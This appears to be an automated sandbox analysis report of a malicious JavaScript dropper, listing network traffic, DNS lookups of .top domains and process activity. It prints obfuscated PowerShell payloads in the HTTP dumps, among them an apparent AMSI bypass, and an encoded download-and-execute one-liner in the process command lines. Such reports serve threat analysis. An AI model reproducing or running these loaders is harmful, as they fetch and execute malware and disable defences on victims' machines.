                                      Mar 28, 2024 10:32:32.255414009 CET4973080192.168.2.4164.90.149.198
                                      Mar 28, 2024 10:32:32.420072079 CET8049730164.90.149.198192.168.2.4
                                      Mar 28, 2024 10:32:32.772068024 CET8049730164.90.149.198192.168.2.4
                                      Mar 28, 2024 10:32:32.772095919 CET8049730164.90.149.198192.168.2.4
                                      Mar 28, 2024 10:32:32.772269964 CET4973080192.168.2.4164.90.149.198
                                      Mar 28, 2024 10:32:32.772981882 CET8049730164.90.149.198192.168.2.4
                                      Mar 28, 2024 10:32:32.819152117 CET4973080192.168.2.4164.90.149.198
                                      Mar 28, 2024 10:32:34.184837103 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.184890985 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.184958935 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.191378117 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.191392899 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.563927889 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.564084053 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.568839073 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.568849087 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.569199085 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.580235004 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.628237009 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.940260887 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.940355062 CET4434973151.91.79.17192.168.2.4
                                      Mar 28, 2024 10:32:34.940459967 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:34.990662098 CET49731443192.168.2.451.91.79.17
                                      Mar 28, 2024 10:32:35.129455090 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:35.129513025 CET4973080192.168.2.4164.90.149.198

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 28, 2024 10:32:28.225900888 CET4968153192.168.2.41.1.1.1
                                      Mar 28, 2024 10:32:28.598092079 CET53496811.1.1.1192.168.2.4
                                      Mar 28, 2024 10:32:31.974881887 CET6539253192.168.2.41.1.1.1
                                      Mar 28, 2024 10:32:32.088143110 CET53653921.1.1.1192.168.2.4
                                      Mar 28, 2024 10:32:33.757102966 CET5914353192.168.2.41.1.1.1
                                      Mar 28, 2024 10:32:34.183868885 CET53591431.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 28, 2024 10:32:28.225900888 CET192.168.2.41.1.1.10x6d5dStandard query (0)isyzgez.topA (IP address)IN (0x0001)false
                                      Mar 28, 2024 10:32:31.974881887 CET192.168.2.41.1.1.10x3c83Standard query (0)mknjddllgakhaje.topA (IP address)IN (0x0001)false
                                      Mar 28, 2024 10:32:33.757102966 CET192.168.2.41.1.1.10xbd60Standard query (0)temp.shA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 28, 2024 10:32:28.598092079 CET1.1.1.1192.168.2.40x6d5dNo error (0)isyzgez.top192.153.57.159A (IP address)IN (0x0001)false
                                      Mar 28, 2024 10:32:32.088143110 CET1.1.1.1192.168.2.40x3c83No error (0)mknjddllgakhaje.top164.90.149.198A (IP address)IN (0x0001)false
                                      Mar 28, 2024 10:32:34.183868885 CET1.1.1.1192.168.2.40xbd60No error (0)temp.sh51.91.79.17A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • temp.sh
                                      • isyzgez.top
                                      • mknjddllgakhaje.top

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449729192.153.57.159803652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 28, 2024 10:32:28.859268904 CET170OUTGET /1.php?s=mints1 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: isyzgez.top
                                      Connection: Keep-Alive
                                      Mar 28, 2024 10:32:29.421091080 CET1286INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 28 Mar 2024 09:32:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 31 66 36 65 0d 0a 24 66 63 62 79 78 6d 76 3d 24 65 78 65 63 75 74 69 6f 6e 63 6f 6e 74 65 78 74 3b 24 65 6e 6f 6e 69 73 74 69 6f 6e 72 65 6f 72 72 65 69 6e 6f 6e 69 6e 6f 6e 65 6e 74 69 6f 6e 65 73 74 69 6f 6e 65 6e 65 73 65 72 20 3d 20 2d 6a 6f 69 6e 20 28 30 2e 2e 35 34 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 28 5b 69 6e 74 5d 28 27 31 32 33 31 32 32 31 32 37 31 32 30 31 32 36 31 32 34 31 32 36 31 32 35 31 32 35 31 32 30 31 32 36 31 31 38 31 31 39 31 32 35 31 32 32 31 32 36 31 32 34 31 32 36 31 32 36 31 31 39 31 32 34 31 32 36 31 32 35 31 32 32 31 32 35 31 32 30 31 32 36 31 27 20 2b 20 27 31 38 31 32 35 31 32 30 31 32 36 31 31 39 31 32 36 31 32 35 31 31 39 31 32 35 31 32 31 31 32 34 31 32 36 31 32 36 31 32 36 31 32 35 31 32 36 31 32 30 31 32 36 31 31 38 31 32 34 31 32 36 31 32 36 31 32 35 31 32 35 31 32 34 31 32 36 31 32 30 31 32 36 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 37 30 29 7d 29 20 2d 6a 6f 69 6e 20 28 30 2e 2e 35 34 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 28 5b 69 6e 74 5d 28 27 31 32 33 31 32 32 31 32 37 31 32 30 31 32 36 31 32 34 31 32 36 31 32 35 31 32 35 31 32 30 31 32 36 31 31 38 31 31 39 31 32 35 31 32 32 31 32 36 31 32 34 31 32 36 31 32 36 31 31 39 31 32 34 31 32 36 31 32 35 31 32 32 31 32 35 31 32 30 31 32 36 31 27 20 2b 20 27 31 38 31 32 35 31 32 30 31 32 36 31 31 39 31 32 36 31 32 35 31 31 39 31 32 35 31 32 31 31 32 34 31 32 36 31 32 36 31 32 36 31 32 35 31 32 36 31 32 30 31 32 36 31 31 38 31 32 34 31 32 36 31 32 36 31 32 35 31 32 35 31 32 34 31 32 36 31 32 30 31 32 36 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 37 30 29 7d 29 3b 24 61 74 65 72 65 72 61 6e 62 65 69 6e 6f 72 62 65 69 73 61 6c 65 64 65 64 61 74 65 73 61 74 61 74 20 3d 20 2d 6a 6f 69 6e 20 28 30 2e 2e 34 38 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 28 5b 69 6e 74 5d 28 27 30 35 32 30 35 32 30 35 38 30 35 34 30 35 37 30 35 39 30 35 31 30 35 39 30 35 37 30 35 38 30 35 37 30 35 36 30 35 37 30 35 39 30 35 38 30 35 38 30 35 37 30 35 38 30 36 30 30 35 39 30 35 37 30 35 37 30 35 39 30 35 39 30 27 20 2b 20 27 35 31 30 35 39 30 35 37 30 35 38 30 35 37 30 35 35 30 35 35 30 35 39 30 35 32 30 35 38 30 35 37 30 35 39 30 35 38 30 35 35 30 35 32 30 35 37 30 35 39 30 35 38 30 35 37 30 35 38 30 36 30 30 35 38 30 35 33 30 35 38 30 35 32 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 33 29 7d 29 20 2d 6a 6f 69 6e 20 28 30 2e 2e 34 38 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 28 5b 69 6e 74 5d 28 27 30 35 32 30 35 32 30 35 38 30 35 34 30 35 37 30 35 39 30 35 31 30 35 39 30 35 37 30 35 38 30 35 37 30 35 36 30 35 37 30 35 39 30 35 38 30 35 38 30 35 37 30 35 38 30 36 30 30 35 39 30 35 37 30 35 37 30 35 39 30 35 39 30 27 20 2b 20 27 35 31 30 35 39 30 35 37 30 35 38 30 35 37 30 35 35 30 35 35 30 35 39 30 35 32 30 35 38 30 35 37 30 35 39 30 35 38 30 35 35 30 35 32 30 35 37 30 35 39 30 35 38 30 35 37 30 35 38 30 36 30 30 35 38 30 35 33 30 35 38 30 35 32 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 33 29 7d 29 3b 24 65 6e 6f 72 65 64 69 73 6f 6e 65 72 69 73 61 74 61 6e 74 69 6f 6e 61 72 6f 6e 65 64 69
                                      Data Ascii: 1f6e$fcbyxmv=$executioncontext;$enonistionreorreinoninonentionestioneneser = -join (0..54 | ForEach-Object {[char]([int]('1231221271201261241261251251201261181191251221261241261261191241261251221251201261' + '18125120126119126125119125121124126126126125126120126118124126126125125124126120126').Substring($($_ * 3), 3) - 70)}) -join (0..54 | ForEach-Object {[char]([int]('1231221271201261241261251251201261181191251221261241261261191241261251221251201261' + '18125120126119126125119125121124126126126125126120126118124126126125125124126120126').Substring($($_ * 3), 3) - 70)});$atereranbeinorbeisalededatesatat = -join (0..48 | ForEach-Object {[char]([int]('0520520580540570590510590570580570560570590580580570580600590570570590590' + '51059057058057055055059052058057059058055052057059058057058060058053058052').Substring($($_ * 3), 3) - 3)}) -join (0..48 | ForEach-Object {[char]([int]('0520520580540570590510590570580570560570590580580570580600590570570590590' + '51059057058057055055059052058057059058055052057059058057058060058053058052').Substring($($_ * 3), 3) - 3)});$enoredisonerisatantionaronedi
                                      Mar 28, 2024 10:32:29.421119928 CET1286INData Raw: 6e 20 3d 20 2d 6a 6f 69 6e 20 28 28 36 32 33 32 2d 28 31 32 36 37 2b 28 38 39 37 33 2d 28 2d 32 37 30 35 2b 28 37 32 38 35 2d 28 35 33 35 34 34 39 32 2f 28 39 34 35 32 2d 39 31 29 29 29 29 29 29 29 2e 2e 28 2d 37 34 37 34 2b 37 35 31 31 29 20 7c
                                      Data Ascii: n = -join ((6232-(1267+(8973-(-2705+(7285-(5354492/(9452-91)))))))..(-7474+7511) | ForEach-Object {[char][int]((53708/(11512032/6216)) + ($enonistionreorreinoninonentionestioneneser + $atereranbeinorbeisalededatesatat).((-jOin (@((7553-7470),(
                                      Mar 28, 2024 10:32:29.421145916 CET1286INData Raw: 2a 20 33 29 2c 20 33 29 20 2d 20 38 31 29 7d 29 20 2d 6a 6f 69 6e 20 28 30 2e 2e 36 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 28 5b 69 6e 74 5d 28 27 31 35 32 31 38 32 31 39 37 31 27 20 2b 20 27 36 35 32 30 32 31
                                      Data Ascii: * 3), 3) - 81)}) -join (0..6 | ForEach-Object {[char]([int]('1521821971' + '65202193182').Substring($($_ * 3), 3) - 81)}))($enoredisonerisatantionaronedin).((-Join (@((8940-8869),(786-(6474-5789)),(-4428+(4880-336)),(84700/(8544-7334)),(628320
                                      Mar 28, 2024 10:32:29.421168089 CET1286INData Raw: 30 34 32 36 33 2f 31 32 32 31 29 29 29 29 2c 28 33 36 39 36 2d 33 35 38 30 29 2c 28 33 37 35 2d 32 37 31 29 2c 28 39 39 38 2d 38 38 37 29 2c 28 33 33 36 32 30 30 2f 28 31 32 34 31 33 2d 39 30 35 31 29 29 29 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a
                                      Data Ascii: 04263/1221)))),(3696-3580),(375-271),(998-887),(336200/(12413-9051)))| ForEach-Object { [char]$_ })))(([system.String]::new(@((203070/2901),(-7384+7498),(1418-1307),(4192-4083),(177012/(-2141+4823)),(386448/3984),(10261-10146),(-3988+4089),(94
                                      Mar 28, 2024 10:32:29.421278954 CET1286INData Raw: 34 38 33 32 2b 37 39 38 34 29 29 2c 28 2d 32 30 31 32 2b 32 31 32 38 29 2c 28 34 35 36 30 34 30 2f 28 31 34 34 39 2b 28 2d 37 33 38 2b 28 34 39 34 38 2d 28 31 31 30 38 33 38 2f 28 2d 38 37 37 30 2b 28 31 34 32 36 39 2d 28 31 30 39 34 38 2d 35 35
                                      Data Ascii: 4832+7984)),(-2012+2128),(456040/(1449+(-738+(4948-(110838/(-8770+(14269-(10948-5536)))))))))))); ) { for ($169adnvsruz43cq = 0; $169adnvsruz43cq -lt $hj2yn4ok6b8crx5.(([system.String]::new(@((-836+944),(1791-1690),(-1839+(-2713+4662)
                                      Mar 28, 2024 10:32:29.421293974 CET1286INData Raw: 29 29 29 29 29 2c 28 2d 38 34 36 33 2b 38 35 37 34 29 2c 28 36 38 38 34 34 36 2f 36 30 33 39 29 2c 28 2d 32 30 39 39 2b 28 2d 36 34 36 30 2b 28 36 32 31 33 31 34 34 30 2f 37 31 35 38 29 29 29 2c 28 35 30 34 32 2d 34 39 35 39 29 2c 28 2d 36 39 32
                                      Data Ascii: ))))),(-8463+8574),(688446/6039),(-2099+(-6460+(62131440/7158))),(5042-4959),(-6923+7039),(2899-(7769-(-701+(14871-(7924+(4049-(8333130/(-4336+(15692292/2142))))))))),(-1926+2027),(184882/1906),(9205-(59042136/(16266446/2506)))) -join ''))( ,
                                      Mar 28, 2024 10:32:29.421490908 CET1286INData Raw: 29 29 2c 28 2d 34 35 38 2b 28 2d 35 32 38 37 2b 28 34 32 38 39 32 32 30 30 2f 37 33 33 32 29 29 29 2c 28 33 35 36 39 34 34 2f 33 31 38 37 29 2c 28 34 32 32 38 38 35 2f 28 31 32 31 38 32 2d 28 31 30 35 39 35 2d 28 31 30 36 39 33 2d 28 2d 39 37 35
                                      Data Ascii: )),(-458+(-5287+(42892200/7332))),(356944/3187),(422885/(12182-(10595-(10693-(-975+8160))))),(4686-4570),(9447-(18776-9443)),(-4034+(-866+5001)),(209520/(20208960/9356)),(400-291))| ForEach-Object { [char]$_ })))($fu4ironpzhmjw2l, ([IO.Compres
                                      Mar 28, 2024 10:32:29.421504021 CET1286INData Raw: 38 38 37 33 37 34 2f 28 31 31 36 38 33 2d 28 32 39 36 33 30 38 38 36 2f 28 2d 36 31 33 2b 28 33 35 39 31 30 38 32 38 2f 28 2d 32 31 35 39 2b 38 34 36 38 29 29 29 29 29 29 29 2c 28 35 37 36 36 33 36 2f 28 31 34 32 39 33 2d 28 34 39 31 37 33 35 35
                                      Data Ascii: 887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o "af9rbmhiZmQ2e
                                      Mar 28, 2024 10:32:29.421679020 CET1286INData Raw: 54 56 2b 55 35 57 65 2f 6d 4f 43 66 35 2f 34 4b 79 4c 33 46 61 58 55 63 68 4c 44 78 4f 73 64 6b 6d 47 79 5a 50 42 57 4d 4d 56 2f 50 6b 39 48 58 7a 56 73 74 6d 59 2f 6c 30 66 4e 39 70 67 72 4c 46 77 36 6a 4c 65 38 77 4f 6f 4b 79 45 78 64 6a 6d 6b
                                      Data Ascii: TV+U5We/mOCf5/4KyL3FaXUchLDxOsdkmGyZPBWMMV/Pk9HXzVstmY/l0fN9pgrLFw6jLe8wOoKyExdjmkh+EaU5BOxN/zmi5kRYUymP+xuuuBaLz3BYrZP54XPJ61DHQcu93EfUDVPvQQDnP75v4qTTZDihDvJSX+O5yXY4s8IiH+n/0/GdK98ZGpbOivHL82hQN3sJ+U973XpTTdMLfxyf3JhBj8L5l6WmnW855YjNAsZEe/m
                                      Mar 28, 2024 10:32:29.421694040 CET763INData Raw: 6f 5a 4d 61 59 30 4b 4e 72 73 50 64 50 31 4c 47 53 71 4b 33 64 44 35 32 59 73 77 54 47 43 61 43 57 50 68 32 5a 79 49 32 73 2f 4f 49 47 48 58 53 6c 4c 65 38 37 50 39 41 4c 39 72 43 44 77 4c 6a 58 54 51 58 30 53 46 44 4c 37 54 74 31 31 77 52 35 69
                                      Data Ascii: oZMaY0KNrsPdP1LGSqK3dD52YswTGCaCWPh2ZyI2s/OIGHXSlLe87P9AL9rCDwLjXTQX0SFDL7Tt11wR5iD2FKyF5YVEDql+jGeyXOYhHFPrzCl3Sjugi9YrxTZeQAVD1qx2tXuy5oqNUFlih90YSKoY92rARjw0C+vwYcsXRmi8/wwsknUOIPdEfwctbVmTNlTnzGY0slC2d6LjRBM+JMe8QV6OCQw9kqZlnTGuuqOtGKZgtS/
                                      Mar 28, 2024 10:32:29.602478981 CET1286INData Raw: 31 30 30 30 0d 0a 36 73 77 7a 51 48 49 56 67 7a 4e 6d 4c 4c 75 43 66 56 7a 6f 37 5a 77 47 70 63 2f 67 66 78 65 50 32 63 46 6d 50 38 35 4f 4f 42 51 76 55 69 37 7a 39 34 56 43 39 57 30 55 72 4d 71 34 73 41 70 55 78 65 30 66 4a 64 61 6b 4f 31 2b 69
                                      Data Ascii: 10006swzQHIVgzNmLLuCfVzo7ZwGpc/gfxeP2cFmP85OOBQvUi7z94VC9W0UrMq4sApUxe0fJdakO1+idJF94JNseq2B7S/Qac73QttDb/0z+Nr3TwM1i98ZNHeNITPaIKOJcuCgSHcwAAi3xmF6LwtkPSZhI5ES6+1nQBB9pP1RSSDy3YP+nprSB/3c1V0d3ruyi/KFKnii8sj6g1qYPPJ2bGvoyo/3QSBbuZf4RBl7Wvei4


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449730164.90.149.198803652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 28, 2024 10:32:32.255414009 CET218OUTGET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: mknjddllgakhaje.top
                                      Connection: Keep-Alive
                                      Mar 28, 2024 10:32:32.772068024 CET1286INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 28 Mar 2024 09:32:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 61 38 0d 0a 0a 24 51 3d 24 6e 75 6c 6c 3b 24 61 63 63 65 3d 22 24 28 28 27 53 79 73 74 27 2b 27 65 6d 27 29 2e 4e 6f 72 4d 61 4c 69 7a 45 28 5b 43 48 61 72 5d 28 5b 62 79 54 65 5d 30 78 34 36 29 2b 5b 63 68 41 72 5d 28 34 36 2b 36 35 29 2b 5b 43 48 61 72 5d 28 5b 42 59 74 65 5d 30 78 37 32 29 2b 5b 63 48 41 52 5d 28 5b 62 59 74 45 5d 30 78 36 64 29 2b 5b 43 48 61 52 5d 28 5b 62 79 74 45 5d 30 78 34 34 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 48 41 72 5d 28 5b 42 79 54 45 5d 30 78 35 63 29 2b 5b 63 48 61 52 5d 28 5b 62 59 74 45 5d 30 78 37 30 29 2b 5b 43 68 41 52 5d 28 31 32 33 29 2b 5b 63 68 61 52 5d 28 37 37 29 2b 5b 63 48 41 52 5d 28 31 31 30 2b 31 39 2d 31 39 29 2b 5b 63 68 41 52 5d 28 5b 62 79 54 45 5d 30 78 37 64 29 29 2e 24 28 28 27 4d e2 6e e3 67 65 6d 65 27 2b 27 6e 74 27 29 2e 6e 6f 72 6d 41 4c 69 5a 45 28 5b 43 48 61 72 5d 28 5b 62 59 54 65 5d 30 78 34 36 29 2b 5b 43 48 41 72 5d 28 34 31 2b 37 30 29 2b 5b 43 48 61 52 5d 28 5b 62 79 74 45 5d 30 78 37 32 29 2b 5b 43 68 61 52 5d 28 5b 42 79 54 45 5d 30 78 36 64 29 2b 5b 43 48 61 72 5d 28 36 38 2b 31 31 2d 31 31 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 48 61 52 5d 28 5b 62 79 74 45 5d 30 78 35 63 29 2b 5b 43 68 41 52 5d 28 31 31 32 29 2b 5b 43 68 61 72 5d 28 31 32 33 2b 37 34 2d 37 34 29 2b 5b 63 48 41 72 5d 28 5b 42 79 74 65 5d 30 78 34 64 29 2b 5b 43 48 41 72 5d 28 39 37 2b 31 33 29 2b 5b 43 48 41 52 5d 28 31 32 35 2a 38 39 2f 38 39 29 29 2e 24 28 28 27 c1 27 2b 27 75 27 2b 27 74 27 2b 27 f5 27 2b 27 6d 27 2b 27 e2 27 2b 27 74 27 2b 27 ee 27 2b 27 f4 27 2b 27 6e 27 29 2e 4e 4f 72 6d 41 6c 49 5a 45 28 5b 63 48 61 52 5d 28 37 30 29 2b 5b 43 48 41 52 5d 28 5b 42 59 54 65 5d 30 78 36 66 29 2b 5b 63 48 61 72 5d 28 31 31 34 2b 31 30 35 2d 31 30 35 29 2b 5b 43 68 41 72 5d 28 5b 42 59 74 45 5d 30 78 36 64 29 2b 5b 43 68 61 52 5d 28 5b 42 59 74 65 5d 30 78 34 34 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 48 41 72 5d 28 39 32 29 2b 5b 63 48 41 72 5d 28 31 31 32 2a 39 33 2f 39 33 29 2b 5b 43 48 41 72 5d 28 31 32 33 29 2b 5b 63 68 61 72 5d 28 37 37 29 2b 5b 63 48 41 72 5d 28 5b 62 79 74 65 5d 30 78 36 65 29 2b 5b 43 68 61 52 5d 28 31 32 35 2a 34 37 2f 34 37 29 29 2e 24 28 28 27 c0 6d 73 ec 55 74 27 2b 27 ee 6c 73 27 29 2e 6e 6f 52 6d 41 6c 69 7a 65 28 5b 63 68 61 72 5d 28 37 30 2b 36 2d 36 29 2b 5b 43 48 41 52 5d 28 5b 62 59 74 65 5d 30 78 36 66 29 2b 5b 63 48 61 72 5d 28 38 36 2b 32 38 29 2b 5b 63 48 41 52 5d 28 31 30 39 29 2b 5b 63 48 61 72 5d 28 5b 62 79 54 45 5d 30 78 34 34 29 29 20 2d 72 65 70 6c 61 63 65 20 5b 43 48 61 52 5d 28 5b 62 59 74 45 5d 30 78 35 63 29 2b 5b 63 68 41 72 5d 28 31 31 32 2a 38 34 2f 38 34 29 2b 5b 43 68 61 52 5d 28 31 32 33 2a 39 2f 39 29 2b 5b 63 48 61 52 5d 28 5b 42 79 74 45 5d 30 78 34 64 29 2b 5b 43 48 41 72 5d 28 31 31 30 2b 31 30 31 2d 31 30 31 29 2b 5b 63 68 61 52 5d 28 31 32 35 2a 33 35 2f 33 35 29 29 22 3b 24 70 69 6f 6f 7a 3d 22 2b 28 27 79 64 6d 6c 27 2b 27 66 74 62 67 27 2b 27 6d 65 6a 67 27 2b 27 6e 72 72 68 27 2b 27 63 70 76 73 27 2b 27 76 72 ee 78 27 29 2e 4e 4f 72 6d 61 6c 69 7a 45 28 5b 43 68 41 52 5d 28 37 30 2b 32 38 2d 32 38 29 2b 5b 43 68 41 72 5d 28 5b 62 59 54 45 5d 30 78 36 66 29 2b 5b 43 68 61 72 5d 28 36 2b 31 30 38 29 2b 5b 43 48 61 52 5d 28 5b 62 59 54 65 5d 30 78 36 64 29 2b 5b 63 48 61 52 5d 28 36 38 2a 34 31 2f 34 31 29 29 20 2d 72 65 70 6c 61 63 65 20
                                      Data Ascii: 7a8$Q=$null;$acce="$(('Syst'+'em').NorMaLizE([CHar]([byTe]0x46)+[chAr](46+65)+[CHar]([BYte]0x72)+[cHAR]([bYtE]0x6d)+[CHaR]([bytE]0x44)) -replace [CHAr]([ByTE]0x5c)+[cHaR]([bYtE]0x70)+[ChAR](123)+[chaR](77)+[cHAR](110+19-19)+[chAR]([byTE]0x7d)).$(('Mngeme'+'nt').normALiZE([CHar]([bYTe]0x46)+[CHAr](41+70)+[CHaR]([bytE]0x72)+[ChaR]([ByTE]0x6d)+[CHar](68+11-11)) -replace [CHaR]([bytE]0x5c)+[ChAR](112)+[Char](123+74-74)+[cHAr]([Byte]0x4d)+[CHAr](97+13)+[CHAR](125*89/89)).$((''+'u'+'t'+''+'m'+''+'t'+''+''+'n').NOrmAlIZE([cHaR](70)+[CHAR]([BYTe]0x6f)+[cHar](114+105-105)+[ChAr]([BYtE]0x6d)+[ChaR]([BYte]0x44)) -replace [CHAr](92)+[cHAr](112*93/93)+[CHAr](123)+[char](77)+[cHAr]([byte]0x6e)+[ChaR](125*47/47)).$(('msUt'+'ls').noRmAlize([char](70+6-6)+[CHAR]([bYte]0x6f)+[cHar](86+28)+[cHAR](109)+[cHar]([byTE]0x44)) -replace [CHaR]([bYtE]0x5c)+[chAr](112*84/84)+[ChaR](123*9/9)+[cHaR]([BytE]0x4d)+[CHAr](110+101-101)+[chaR](125*35/35))";$piooz="+('ydml'+'ftbg'+'mejg'+'nrrh'+'cpvs'+'vrx').NOrmalizE([ChAR](70+28-28)+[ChAr]([bYTE]0x6f)+[Char](6+108)+[CHaR]([bYTe]0x6d)+[cHaR](68*41/41)) -replace
                                      Mar 28, 2024 10:32:32.772095919 CET860INData Raw: 5b 43 68 61 72 5d 28 5b 62 79 54 45 5d 30 78 35 63 29 2b 5b 43 68 41 52 5d 28 5b 42 79 74 45 5d 30 78 37 30 29 2b 5b 63 68 41 72 5d 28 31 32 33 29 2b 5b 63 68 61 52 5d 28 37 37 2a 31 32 2f 31 32 29 2b 5b 43 68 41 52 5d 28 31 31 30 2b 37 33 2d 37
                                      Data Ascii: [Char]([byTE]0x5c)+[ChAR]([BytE]0x70)+[chAr](123)+[chaR](77*12/12)+[ChAR](110+73-73)+[ChAr]([BytE]0x7d)";[Threading.Thread]::Sleep(833);[Ref].Assembly.GetType($acce).GetField($(('ms'+'ntF'+'led').NorMalizE([cHAR]([byte]0x46)+[CHaR]([BYTe
                                      Mar 28, 2024 10:32:32.772981882 CET5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973151.91.79.174433652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-28 09:32:34 UTC72OUTGET /bfseS/ruzxs.exe HTTP/1.1
                                      Host: temp.sh
                                      Connection: Keep-Alive
                                      2024-03-28 09:32:34 UTC173INHTTP/1.1 404 NOT FOUND
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 28 Mar 2024 09:32:34 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 14
                                      Connection: close
                                      2024-03-28 09:32:34 UTC14INData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: File not found


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:10:32:22
                                      Start date:28/03/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
                                      Imagebase:0x7ff693bd0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:10:32:23
                                      Start date:28/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:10:32:23
                                      Start date:28/03/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
